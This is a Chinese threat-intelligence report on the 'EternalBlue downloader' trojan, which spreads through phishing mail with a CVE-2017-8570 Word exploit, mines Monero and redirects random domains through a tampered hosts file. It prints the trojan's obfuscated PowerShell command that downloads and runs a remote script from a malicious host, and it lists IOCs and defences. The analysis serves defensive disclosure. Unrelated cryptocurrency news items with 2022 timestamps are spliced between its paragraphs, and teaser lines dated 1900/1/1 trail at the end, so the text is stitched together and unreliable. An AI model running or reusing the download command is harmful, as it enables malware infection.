來源:騰訊御見威脅情報中心
編者注:原標題為《“永恒之藍下載器木馬”新增釣魚郵件傳播,附件含CVE-2017-8570漏洞攻擊代碼》
“永恒之藍”下載器木馬在感染用戶機器上運行后,會自動當前用戶的郵箱通訊錄并發送附件為urgent.doc的文檔,該文檔附帶CVE-2017-8570漏洞攻擊代碼。
如果被攻擊用戶收到郵件并不慎打開文檔,就可能觸發漏洞執行Powershell命令下載mail.jsp:
CoinShares研究主管:機構投資者對加密貨幣“繼續猶豫不決”:金色財經報道,在最新的報告中,CoinShares研究主管James Butterfill強調了機構對加密貨幣投資產品的冷淡情緒,該報告連續第三周出現“小幅流入”。Butterfill說:“流量仍然很低,意味著投資者繼續猶豫不決,這在投資產品交易量中得到了強調,該周的交易量為8.86億美元,是2020年10月以來的最低值。”
此前消息,CoinShares最新報告顯示,上周數字資產投資產品凈流入1030萬美元,為連續第三周流入,其中比特幣投資與以太坊投資產品分別凈流入770萬美元與560萬美元。(Cointelegraph)[2022/10/4 18:39:17]
C:/Windows/System32/cmd.exe/cpowershellIE`x(Ne`w-Obj`ectNet.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)
CREDAI與Venture Catalysts成立1億美元proptech基金,專注于區塊鏈房產等領域投資:9月8日消息,印度房地產開發商協會聯合會(CREDAI)與綜合孵化器和加速器Venture Catalysts宣布合作成立了一個總規模達1億美元的proptech基金,專注于投資通過數據分析、區塊鏈、增強現實(AR)、人工智能等技術推動房地產行業發展的初創公司。(yourstroy)[2022/9/8 13:16:22]
而下載使用的域名ap35nf7.jp實際上并沒有注冊,但是依然能夠解析到地址:t.awcna.com,是因為被感染機器的本地hosts文件被篡改,使得隨機生成的域名映射到木馬使用的惡意地址,細節請參考御見威脅情報中心此前發布的報告:《“永恒之藍下載器”木馬篡改hosts指向隨機域名,再用多個漏洞攻擊內網挖礦》。
數據:1小時前有4.5萬枚ETH從Crypto.com轉移到地址0xcf...0703:9月2日消息,Tokenview數據顯示,1小時前有4.5萬枚ETH從Crypto.com轉移到地址0xcf...0703。[2022/9/2 13:04:57]
本次攻擊過程中,木馬將使用隨機生成的字符加“.cn”或”.jp“或”.kr“后綴作為DGA域名,并在hosts文件中指向域名:
t.tr2q.com,t.awcna.com,t.amynx.com
mail.jsp經過高度混淆,多次解密后可以看到其安裝多個計劃任務下載Powershell腳本執行,并使用了新的計劃任務名:
“Bluetea“藍茶。
“永恒之藍”下載器木馬自出現之后從未停止更新,從最初的PE樣本攻擊到后來轉移為以Powershell無文件攻擊方式躲避查殺,并且通過安裝多個類型的計劃任務進行持久化。在傳播方式上,最初通過供應鏈攻擊積累一批感染機器后,又不斷利用”永恒之藍”漏洞,MSSql爆破,$IPC爆破,RDP爆破等方法進行擴散傳播,近期又增加了DGA域名攻擊和釣魚郵件攻擊,其最終目的只為利用用戶機器挖礦門羅幣獲利。
永恒之藍下載器木馬的歷次版本更新參考下表:
安全建議
1.建議用戶不要輕易打開不明來源的郵件附件,對于郵件附件中的文件要格外謹慎運行,如發現有腳本或其他可執行文件可先使用殺軟件進行掃描;
2.服務器使用安全的密碼策略,特別是IPC$、MSSQL、RDP賬號密碼,切勿使用弱口令,避免遭遇弱密碼爆破攻擊;
3.根據微軟安全公告及時修復Office漏洞CVE-2017-8570,需進行漏洞掃描和修復,或采用WindowsUpdate進行。
IOCs
http//t.awcna.com/mail.jsp
來源:互鏈脈搏 作者:金走車 近期,國內區塊鏈標準建設提速。4月以來,2項區塊鏈國家標準獲批立項;1項防偽溯源類國家標準對區塊鏈在該領域的應用做了明確要求;1項“區塊鏈+疫情防控”省級地方標準獲.
1900/1/1 0:00:00對于現在正在考慮將數字貨幣作為法定貨幣的央行而言,這場新冠肺炎危機來的太快了,由于對健康的擔憂而帶來的金融問題可能會加速央行數字貨幣的到來.
1900/1/1 0:00:00前段時間,OKEX宣布銷毀所有未發行的7億OKB,總價約200多億元。不久,火幣也發布月度銷毀公告,共計銷毀約50億元共1.47億枚HT.
1900/1/1 0:00:003月27日,湖南省工業和信息化廳發布《關于公布2020年湖南省大數據和區塊鏈產業發展重點項目的通知》,這是進入2020年以來,國內首個由省級政府支持的將區塊鏈作為重點發展項目的政策文件.
1900/1/1 0:00:00當四周前比特幣的價格急劇下跌時,由于投資者開始囤幣,轉向持有比特幣,比特幣網絡活動出現了下降趨勢。隨著近日比特幣每日交易量再次增加,比特幣轉移活動開始升溫,這種趨勢正在逆轉.
1900/1/1 0:00:00目前人臉識別技術廣泛應用于智慧社區和智慧城市的建設,由此搭建的人臉識別系統也是公共安全指揮設施的核心支撐平臺,更是整個智慧感知體系的關鍵部分和重要的信息來源.
1900/1/1 0:00:00